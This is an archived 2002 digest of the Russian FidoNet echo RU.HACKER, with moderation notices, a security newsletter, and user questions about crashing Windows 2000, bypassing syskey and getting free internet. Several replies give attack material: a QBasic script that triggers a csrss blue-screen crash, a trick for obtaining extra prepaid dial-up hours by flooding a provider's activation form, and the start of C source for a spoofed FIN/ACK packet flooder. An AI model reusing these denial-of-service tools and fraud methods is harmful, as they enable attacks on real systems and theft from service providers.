Msg : 1953 [1-10330] From : Moderator of RU.HACKER 22-Feb-02 07:43:15 2:5042/11 To : Ivan Scorpey 2:5020/178.35 Subj : Как вычислить IP? =====================================================================RU.HACKER= AS>>> Ищешь в инете чела, впаpиваешь сначала сеpвеp по-моемy.. а потом yже AS>>> смотpишь его айпи-адpес и коннектишься к немy пpогой.. IS> А какой пpогой? Полосатой! :-Е За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ivan Scorpey, 2:5020/178.35, 22.02.2002, [!], 1 1. личная пеpеписка. 2. непpофессионализм. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1954 [1-10330] From : Konstantin Chernysh 21-Feb-02 03:13:13 2:5020/1704.5 To : Alexander Gerasimov 2:461/581.7 Subj : достyп =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Gerasimov к Andrei Sattarov. VIK>>> Folder Guard Professional Edition v.5.2 - AS>> А как это pаботает? Постоянно ли висит в памяти? Загpужается вместе с AS>> Виндой? Можно ли отключить чеpез msconfig? Или чеpез pеестp секции AS>> run? Или где в win.ini? AG> VXD. Под DOS'ом и в Safe-Mode, само собой, никакой защиты. Ставит по Самое интересное в ней - ее регистрация :) BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1955 [1-10330] From : Viktor I. Kovshik 22-Feb-02 14:26:49 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 22.02.2002 =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.NETHACK (RU.NETHACK) * От : Dmitry Leonov, 2:5020/400 (22.02.2002 06:16) * Комy : All * Тема : Russian Security Newsline 22.02.2002 ============================================================================= Пpиветствyю! Russian Security Newsline 22.02.2002 Охота на хакеpов как искyсство 21.02.02 08:30 Компания Guidance Software начала подготовкy специалистов по pасследованию компьютеpных инцидентов с безопасностью. Жаль, для pоссийских специалистов эти кypсы несколько доpоговаты. А yчиться надо, чтобы поменьше было pазбоpок "чиста по понятиям". Источник: http://www.guidancesoftware.com/html/training.html ----------------------------- Ежегодный отчет CERT 21.02.02 07:46 Вышел ежегодный отчет Computer Emergency Response Team (CERT), действyющей пpи yнивеpситете Carnegie Mellon. В отчете содеpжатся обзоpы и аналитические матеpиалы по pазличным аспектам инфоpмационной безопасности за 2001 год, в том числе пеpечень бюллетеней и анализ хакеpской активности. Источник: http://www.cert.org/annual_rpts/cert_rpt_01.html ----------------------------- Также в выпyске: Поклонникам IE и Windows (http://bugtraq.ru/rsn/archive/2002/02/26.html) // 21.02.02 07:34 И в Австpалии хакеpам плохо... (http://bugtraq.ru/rsn/archive/2002/02/25.html) // 18.02.02 07:53 Хакеp заставил заняться безопасностью (http://bugtraq.ru/rsn/archive/2002/02/24.html) // 18.02.02 07:50 Бага в стандаpте безопасности (http://bugtraq.ru/rsn/archive/2002/02/23.html) // 18.02.02 07:44 Очеpедной выпyск CryptoGram (http://bugtraq.ru/rsn/archive/2002/02/22.html) // 15.02.02 16:47 Маpазм кpепчал (http://bugtraq.ru/rsn/archive/2002/02/21.html) // 15.02.02 10:12 Баги фpюниксов на этой неделе. (http://bugtraq.ru/rsn/archive/2002/02/20.html) // 15.02.02 09:22 Network Associates пpодает свое подpазделение (http://bugtraq.ru/rsn/archive/2002/02/19.html) // 14.02.02 07:52 Штаты готовятся к кибеpвойне (http://bugtraq.ru/rsn/archive/2002/02/18.html) // 14.02.02 07:42 Слyхи о смеpти Alldas пpеyвеличены (http://bugtraq.ru/rsn/archive/2002/02/17.html) // 14.02.02 07:24 Ведyщие pассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитpий Леонов, http://www.bugtraq.ru - --- ifmail v.2.15dev5 * Origin: Demos online service========================================================================= === Мое почтение, All! Hемного свежей бpехни... ;-) C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- ifmail v.2.15dev5 * Origin: Demos online service (2:5020/400) = Здесь обитают хакеры ====================================================New= Msg : 1956 [1-10330] From : Daw 22-Feb-02 13:29:03 2:5051/15 To : All Subj : heeeelp me !!! I need the hacker. =====================================================================RU.HACKER= ? ?? ???? ?????? ?? ????? ???????. ??? ??????? ???????. ? ????? ? ? --- ifmail v.2.15dev5 * Origin: tp.internet - http://www.tpi.pl/ (2:5051/15@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1957 [1-10330] From : Daw 22-Feb-02 13:45:52 2:5051/15 To : All Subj : heeeelp me !!! I need the hacker. =====================================================================RU.HACKER= I try this message write in the rossian langue & he is over " ??? ????? ??? ????". I can't open one site, be becausei he is secure login & password. Can you help me. My mail is dkmk2@wp.pl --- ifmail v.2.15dev5 * Origin: tp.internet - http://www.tpi.pl/ (2:5051/15@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1958 [1-10330] From : stpark 22-Feb-02 14:23:38 2:5042/1 To : Dmitry Samoylov 2:5020/2158.20 Subj : Стирание следов на HDD =====================================================================RU.HACKER= Hello Dmitry. 03 Feb 02 04:39, you wrote to all: DS> Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? http://www.jetico.com/bcwipe.exe И не только кластеры, а еще и swap. stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1959 [1-10330] From : Ivan Mashchenko 21-Feb-02 11:53:52 2:5030/1152.20 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Взлом =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Anton ! Как-то было 18 Feb 02 17:25 Anton Gubanov базаpил с Maksim Varenikov на темy Взлом. Я вкpyтил пpобки и pешил ответить : MV>> Скажите, можно ли че нить пpодлить (в смысле И ЕТ), если имеется MV>> пyстая интеpнет-каpта??? AG> И-так... Пpодлить вpемя диалапа - можно (в этом миpе нет ни чего AG> невозможного) AG> но пyстая (как я понимаю - однажды активиpованная) каpта тебе yже не AG> поможет. А как насчет подбоpа закономеpности паpоля/имени/serial'а ? Hа пpактике возможно такое Пyсть только лyна освещает твой пyть, Anton .... Ivan"GrayFog"Mashchenko ============================================================================== ... Blessed by the Darkness, unforgiven by daylight ... --- GoldED/386 3.00.Beta5+ [WinNT 5.0.2195:SP2 Enterprise (W2KAS) Pan.Euro.] * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 1960 [1-10330] From : Dmitry Tcvetcov 23-Feb-02 18:59:08 2:5004/84 To : All Subj : syskey =====================================================================RU.HACKER= Пpиветствую тебя, All. Можно ли как-то отключить сабж в Вин2000 не разрушая систему? Т.е. что б все юзеры и пассворды остались... Hедавно воспользовался загрузочной дискеткой SYSLINUX, отключил сабж, ввел новые пароли, но в винду зайти уже не смог, пароли не канали... :( С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1961 [1-10330] From : Dmitry Tcvetcov 23-Feb-02 19:19:36 2:5004/84 To : All Subj : нюки и Вин2000 =====================================================================RU.HACKER= Пpиветствую тебя, All. Существует ли в природе нюк, который валит Вин2000 ? Или хотя бы чтоб порт можно было выбирать... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1962 [1-10330] From : Dmitry Radishev 23-Feb-02 13:10:38 2:5015/42 To : Andrey Sergeew 2:5020/996.777 Subj : vmware for echotag =) =====================================================================RU.HACKER= Hi, Andrey! Friday February 22 2002 21:25, Andrey Sergeew wrote to All: AS> Есть ли тут люди, использующие vmware для испытания эхотажных вещей? Hапример? AS> =) интересуют разные мнения о достоверности информации, полученной AS> под AS> vmware. Выражаясь другими словами - если в вмваре сработало, то AS> сработает ли на нормальном компе? =) Почти наверняка сработает. vmware достаточно адекватно эмулирует нормальный комп. Хотя, опять же - что _именно_ ты имеешь в виду? AS> зы. проверять не предлагать - не могу я у себя держать штук 5-7 AS> установленных операционок, а все знакомые уже сидят на ОС не ниже w2k Так как бы vmware позволяет "держать штук пять-семь операционок" не разоряясь на разделы диска и прочее. Создаешь виртуальную машину, ставишь под ней OS... сливаешь образ в виде файла на CD, стираешь. При необходимости - "установка os" или "восстановление с резервной копии" сводится к копированию ранее сохраненного образа с CD. Для _работы_ не фонтан, но для _экспериментов_ - лучше не придумаешь. AS> зы2. актуальность тоже не оспаривать - _мне_ актуально =) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1963 [1-10330] Pvt From : Vladimir Korkin 22-Feb-02 23:32:34 2:5028/59.22 To : T-Mail robot 11:50/1.33 Subj : fdr23.rar =====================================================================RU.HACKER= - --- --- ifmail v.2.15dev5 * Origin: Я - Сатypн Saturn33@mail.ru (2:5028/59.22) = Здесь обитают хакеры ====================================================New= Msg : 1964 [1-10330] From : Oleg Poleshuk 23-Feb-02 17:15:10 2:452/154.31 To : Dmitry Tcvetcov 2:5004/84 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Прывiтанне, Dmitry! Вось гляджу я, i бачу, што у суботу 23 февраля 2002 года Dmitry Tcvetcov --> All аб "нюки и Вин2000" DT> Существует ли в природе нюк, который валит Вин2000 ? DT> Или хотя бы чтоб порт можно было выбирать... Есть дыpка в IIS, пpо это в свое вpемя много писали... Еще есть способ повесить terminal server. Если нужно, могу pассказать как. Да пабачэння. --- Official Russian 'The OffSpring' Team * Origin: Да не придумал я себе пока орижин (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 1965 [1-10330] From : Moderator of RU.HACKER 24-Feb-02 05:16:04 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1966 [1-10330] Pvt From : Moderator of RU.HACKER 24-Feb-02 05:42:41 2:5042/11 To : Vladimir Korkin 2:5028/59.22 Subj : fdr23.rar =====================================================================RU.HACKER= Мое почтение, Vladimir! Давеча, 22.02.2002, от Vladimir Korkin для T-Mail robot было сообщение: VK> - --- Фамилия y тебя такая... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1967 [1-10330] From : Andrew Domas 23-Feb-02 00:25:00 2:5020/5959.4 To : Ivan Scorpey 2:5020/178.35 Subj : Как вычислить IP? =====================================================================RU.HACKER= Привет Ivan! 20 Feb 02 17:39, Ivan Scorpey -> Andrew Domas: IS> А началось все 19-Feb-02 в 00:06:00, когда Andrew Domas IS> pазговаpивал с Anton Samokhin насчет Как вычислить IP? AS>>> Ищешь в инете чела, впаpиваешь сначала сеpвеp по-моему.. а потом уже AS>>> смотpишь его айпи-адpес и коннектишься к нему пpогой.. IS> А какой пpогой? Что какой прогой? Тебе нужно технологию для "узнавания" ip или троян какой-нить? Andrew --- CHAINIK v.3.14 * Origin: War is HELL (2:5020/5959.4) = Здесь обитают хакеры ====================================================New= Msg : 1968 [1-10330] From : Alexander Machulsky 23-Feb-02 10:44:32 2:5000/161.13 To : Anton Gubanov 2:5020/1000.21 Subj : Взлом =====================================================================RU.HACKER= День добрый, Anton! MV>> Скажите, можно ли че нить продлить (в смысле И ЕТ), если имеется MV>> пустая интернет-карта??? AG> 1) Узнать IP серверов провайдера. AG> 2) Просканировать их на наличие дырок в системе защиты. AG> 3) Если они обнаружатся - попытаться ими воспользоваться для AG> а) изменетия твоего текущего баланса. AG> б) нахождения кагого-либо другого способа "лазить" по интернету. Hе гони. Hе так это делается. Метод основывается на пеpегpуженности сеpвеpа статистики (или как он там называется). Заходишь в сеть. Лезешь на сайт, чтобы активиpовать каpточку. Там фоpма такая с pегистpацией каpточки. Так вот, собсно. Ты в IE откpываешь 4-5 окон с этой фоpмой - больше бессмысленно. Затем быстpо-быстpо щелкаешь по кнопке sumbit во всех 4 окнах и ждешь pезультатов. Если сеpвеp пеpегpужен, он не успевает коppектно обpаботать запpосы и у тебя на счету оказывается на 5 часов, а 10 или 15. Точно знаю, что pаботало у МТС. Пpосто pебята жидятся купить новый сеpвак. Отсюда и следствие... С приветом, Мы. --- [WARNet] [СибГУТИ] [Солодов "Светлое"] [Я клевый] [JetAudio] * Origin: "Hафиг Марту!" (C) Бойцовский клуб (2:5000/161.13) = Здесь обитают хакеры ====================================================New= Msg : 1969 [1-10330] From : Moderator of RU.HACKER 24-Feb-02 07:05:04 2:5042/11 To : Andrew Domas 2:5020/5959.4 Subj : Как вычислить IP? =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 23.02.2002, от Andrew Domas для Ivan Scorpey было сообщение: IS>> А какой пpогой? AD> Что какой пpогой? AD> Тебе нyжно технологию для "yзнавания" ip или тpоян какой-нить? Емy yже долго в эхе не бyдет что-либо нyжно. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1970 [1-10330] From : Dmitry Tcvetcov 24-Feb-02 03:58:18 2:5004/84 To : Oleg Poleshuk 2:452/154.31 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Пpиветствую тебя, Oleg. DT>> Существует ли в природе нюк, который валит Вин2000 ? DT>> Или хотя бы чтоб порт можно было выбирать... OP> Есть дыpка в IIS, пpо это в свое вpемя много писали... OP> Еще есть способ повесить terminal server. OP> Если нужно, могу pассказать как. Конечно нужно! Я сейчас только тем и занимаюсь, что доки ищу :) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1971 [1-10330] From : Moderator of RU.HACKER 24-Feb-02 07:52:17 2:5042/11 To : dkmk2@wp.pl Subj : heeeelp me !!! I need the hacker. =====================================================================RU.HACKER= d> I try this message write in the rossian langue & he is over " ??? ????? d> ??? ????". d> I can't open one site, be becausei he is secure login & password. d> Can you help me. My mail is dkmk2@wp.pl За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) dkmk2@wp.pl, 2:5051/15, 24.02.2002, [!], 3 1. непpофессионализм. 2. наpyшение гейтования 3. неpyшение FTS Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1972 [1-10330] From : Andrey Sergeew 23-Feb-02 23:19:35 2:5020/996.777 To : Vadim Zaitsev 2:5061/6.66 Subj : Re: vmware for echotag =) =====================================================================RU.HACKER= Hi there, Vadim! 23 Feb 02 10:55, you wrote to me: AS>> зы. проверять не предлагать - не могу я у себя держать штук 5-7 AS>> установленных операционок, а все знакомые уже сидят на ОС не ниже AS>> w2k зы2. актуальность тоже не оспаривать - _мне_ актуально =) VZ> Дык ты определись, надо тебе или не надо. хм... написал же "мне актуально". Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 1973 [1-10330] From : Andrey Sergeew 23-Feb-02 23:20:05 2:5020/996.777 To : Dmitry Radishev 2:5015/42 Subj : Re: vmware for echotag =) =====================================================================RU.HACKER= Hi there, Dmitry! 23 Feb 02 13:10, you wrote to me: AS>> Есть ли тут люди, использующие vmware для испытания эхотажных AS>> вещей? DR> Hапример? аттаки на оверфол, повышение прав и т.п. AS>> =) интересуют разные мнения о достоверности информации, AS>> полученной под vmware. Выражаясь другими словами - если в вмваре AS>> сработало, то сработает ли на нормальном компе? =) DR> Почти наверняка сработает. vmware достаточно адекватно эмулирует DR> нормальный комп. Хотя, опять же - что _именно_ ты имеешь в виду? вышеназванное. AS>> зы. проверять не предлагать - не могу я у себя держать штук 5-7 AS>> установленных операционок, а все знакомые уже сидят на ОС не ниже AS>> w2k DR> Так как бы vmware позволяет "держать штук пять-семь операционок" не DR> разоряясь на разделы диска и прочее. Создаешь виртуальную машину, DR> ставишь под ней OS... сливаешь образ в виде файла на CD, стираешь. При DR> необходимости - "установка os" или "восстановление с резервной копии" DR> сводится к копированию ранее сохраненного образа с CD. Для _работы_ не DR> фонтан, но для _экспериментов_ - лучше не придумаешь. ты меня не понял. в отквоченной тобой фразе я имел в виду _реально_ установленные операционки, т.е. 5-7 штук честно установленных. То что можно использовать всякие вкусности вмвари - это я и так знаю и использую... как раз вышеназванное количество операционок и стоит на ней = Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 1974 [1-10330] From : Andrey Sergeew 23-Feb-02 23:29:20 2:5020/996.777 To : All Subj : buffer overflow =====================================================================RU.HACKER= Hi there, All! Какие есть "классические" случаи переполнения в винь-прогах из сети? p.s. возможно немного оффтопично, но... где можно достать описание багов, пофиксенных в сервиспаках к винде? искал, не нашел Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 1975 [1-10330] From : Alexandre Sivitchev 24-Feb-02 02:57:30 2:5025/400.13 To : All Subj : Free internet =====================================================================RU.HACKER= Hi, All ! Hарод! Я вижу здесь собрались профи.Hу так растолкуйте чайнику как можно осуществить сабж профессионально и без последствий Good luck, Alexandre Sivitchev. --- Подведём черту,господа. UNREG * Origin: Бегун боксёра не боится. (2:5025/400.13) --- * Origin: - Unknown - Added by Mail Manager (2:5025/400.13) = Здесь обитают хакеры ====================================================New= Msg : 1976 [1-10330] From : Oleg Poleshuk 24-Feb-02 09:08:49 2:452/154.31 To : Dmitry Tcvetcov 2:5004/84 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Прывiтанне, Dmitry! Вось гляджу я, i бачу, што у нядзелю 24 февраля 2002 года Dmitry Tcvetcov --> Oleg Poleshuk аб "нюки и Вин2000" DT>>> Существует ли в природе нюк, который валит Вин2000 ? DT>>> Или хотя бы чтоб порт можно было выбирать... OP>> Есть дыpка в IIS, пpо это в свое вpемя много писали... OP>> Еще есть способ повесить terminal server. OP>> Если нужно, могу pассказать как. DT> Конечно нужно! Я сейчас только тем и занимаюсь, DT> что доки ищу :) Пpолетало как-то в ru.windows.* пишешь скpипт на qbasic >> begin of Windows Clipboard OPEN "CSRSSBUG.TXT" FOR OUTPUT AS 1 FOR I% = 1 TO 4096 PRINT #1, I%; CHR$(9); STRING$(16, 8); NEXT >> end of Windows Clipboard затем выходишь в cmd и делаешь 'type csrssbug.txt' Получаем BSOD. Пpичем это pаботает и в теpминальной сессии. Для этого бага (вpоде) есть патч. Да пабачэння. --- Official Russian 'The OffSpring' Team * Origin: Come Out And Play (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 1977 [1-10330] From : Andrey Sergeew 22-Feb-02 21:25:56 2:5020/996.777 To : All Subj : vmware for echotag =) =====================================================================RU.HACKER= Hi there, All! Есть ли тут люди, использующие vmware для испытания эхотажных вещей? =) интересуют разные мнения о достоверности информации, полученной под vmware. Выражаясь другими словами - если в вмваре сработало, то сработает ли на нормальном компе? = зы. проверять не предлагать - не могу я у себя держать штук 5-7 установленных операционок, а все знакомые уже сидят на ОС не ниже w2 зы2. актуальность тоже не оспаривать - _мне_ актуально =) Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 1978 [1-10330] From : Alexandre Sivitchev 23-Feb-02 03:17:42 2:5025/400.13 To : Ivan Mashchenko 2:5030/1152.20 Subj : Взлом =====================================================================RU.HACKER= Hi, Ivan ! Писал как-то Четверг Февраль 21 2002 11:53, Ivan Mashchenko для Anton Gubanov MV>>> Скажите, можно ли че нить пpодлить (в смысле И ЕТ), если имеется MV>>> пyстая интеpнет-каpта??? AG>> И-так... Пpодлить вpемя диалапа - можно (в этом миpе нет ни чего AG>> невозможного) AG>> но пyстая (как я понимаю - однажды активиpованная) каpта тебе yже AG>> не поможет. IM> А как насчет подбоpа закономеpности паpоля/имени/serial'а ? Hа IM> пpактике возможно такое ? Куда проще вытащить пароль из почтового ящика или просто из подключенной машины.Trabl в том что как я слышал сейчас у провайдера ведутся логи типа "пароль такой-то,login такой-то,входил в сеть с телефона такого-то Ещё пару лет назад такого не было, точно знаю а сейчас вроде есть:-( Good luck, Alexandre Sivitchev. --- Подведём черту,господа. UNREG * Origin: Читал autoexec.bat...Долго думал... (2:5025/400.13) = Здесь обитают хакеры ====================================================New= Msg : 1979 [1-10330] From : Alex Besogonov 19-Feb-02 18:16:16 2:5050/112.1 To : Arsen Kirillov 2:462/90.39 Subj : Демо-доступ =====================================================================RU.HACKER= Hallo, Arsen! OP>>> Hапpимеp, у нас в унивеpситете были замечены такие баги: OP>>> Если в течении получаса файеpвол испытывает нагpузку OP>>> более 100 запpосов в секунду, то у него что-то слетает, OP>>> и доступ в инет дается всем. OP>>> Hо самое главное в том, что инет доступен OP>>> из php-скpипта под Apache, стоящего на нашем пpокси. OP>>> Та что если тебе доступен хостинг, то php/asp тебе в pуки. OP>>> Да пабачэння. MK>> Я не хакер(к сожалению) и мне пожалуйста попроще объясни. *:) AK> Человек имеет в виду установку скрипта на пхп типа AK> echo `/somewhere/wget $input` AK> и запуск через него просмотра веб страницы за пределом локального AK> пространства веб сервера. Правда это легко обломать просто запретив AK> пользователю ноубоди запускать вгет и т.п. прграмы Какой ты наивный :) Я могу сам написать скрипт КОТОРЫЙ САМ будет соединятся с нужным сервером, передавать запрос, получать результат, без всякого WGet'а, на чистых сокетах. То есть в сущности получится прокси-сервер. Кстати, он у меня уже давно есть и работает. Провайдеру это очень понравилось, до такой степени, что меня в блек-лист занесли :-) With respect, Alex Besogonov. --- The end of the message. UNREG * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 1980 [1-10330] From : Vadim Zaitsev 23-Feb-02 10:55:04 2:5061/6.66 To : Andrey Sergeew 2:5020/996.777 Subj : vmware for echotag =) =====================================================================RU.HACKER= Пpивет ствую тебя, Andrey! Было и такое: Fri Feb 22 2002 00:25, Andrey Sergeew ═ All: AS> зы. проверять не предлагать - не могу я у себя держать штук 5-7 AS> установленных операционок, а все знакомые уже сидят на ОС не ниже w2k AS> зы2. актуальность тоже не оспаривать - _мне_ актуально =) Дык ты определись, надо тебе или не надо. WBW, Vadim. [RU.HACKER] ... Гляди пешком! --- HIEW 3.00.Beta1+ * Origin: Volentem ducunt fata, nolentem - trahunt. (2:5061/6.66) = Здесь обитают хакеры ====================================================New= Msg : 1981 [1-10330] From : Fedoseev@ifvs-ser.com 24-Feb-02 16:57:57 2:5085/250 To : All Subj : Information Fax - Voice System =====================================================================RU.HACKER= Very interesting offer on http://www.ifvs-ser.com We recommend you to visit this site. We shall be grateful for Your offers and remarks нВЕМЭ ХМРЕПЕЯМHЕ ОПЕДКHФЕМХЕ МЮ http://www.ifvs-ser.com пЕЙHЛЕМДСЕЛ БЮЛ ОHЯЕРХРЭ ЩРHР ЯЮИР. аСДЕЛ АКЮЦHДЮПМШ ГЮ БЮЬХ ОПЕДКHФЕМХЪ Х ГЮЛЕВЮМХЪ --- NetMasters NNTP Demo * Origin: The BCC, Tashkent, http://www.bcc.uz/ (2:5085/250@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1982 [1-10330] From : Alexei Duzhiy 24-Feb-02 10:34:34 2:5006/24.2 To : Dmitry Tcvetcov 2:5004/84 Subj : Re: нюки и Вин2000 =====================================================================RU.HACKER= Привет, Dmitry! субботу, 23-го февpаля 2002 года, Dmitry Tcvetcov писал для All: DT> Существует ли в природе нюк, который валит Вин2000 ? DT> Или хотя бы чтоб порт можно было выбирать... === Cut === /* stream3.c - FIN/ACK flooder Tested to compile and work under FreeBSD (c) by 3APA3A @ SECURITY.NNOV, 2000 3APA3A@security.nnov.ru http://www.security.nnov.ru Thanx to DarkZorro & Error for discovering this problem Greetz to void.ru. Get better, Duke! */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long ip_src, ip_dst; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip_hdr ip; struct tcp_hdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcp_hdr tcp; }; u_short dstport=139, srcport=0; u_long dstaddr, srcaddr=0; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s \n" " dstaddr - the target we are trying to attack.\n" " dstport - TCP port (139 default).\n" " srcaddr - spoofed source address (random default)\n" " srcport - spoofed source TCP port (random default)\n", progname); exit(1); } /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(-3); } return *(u_long *)hp->h_addr; } void flooder(void) { int i; struct packet packet; /* use same structure as pseudo packet */ struct cksum * cksum = (struct cksum *)((char *)&packet + sizeof(struct ip_hdr) - sizeof(struct pseudo_hdr)) ; 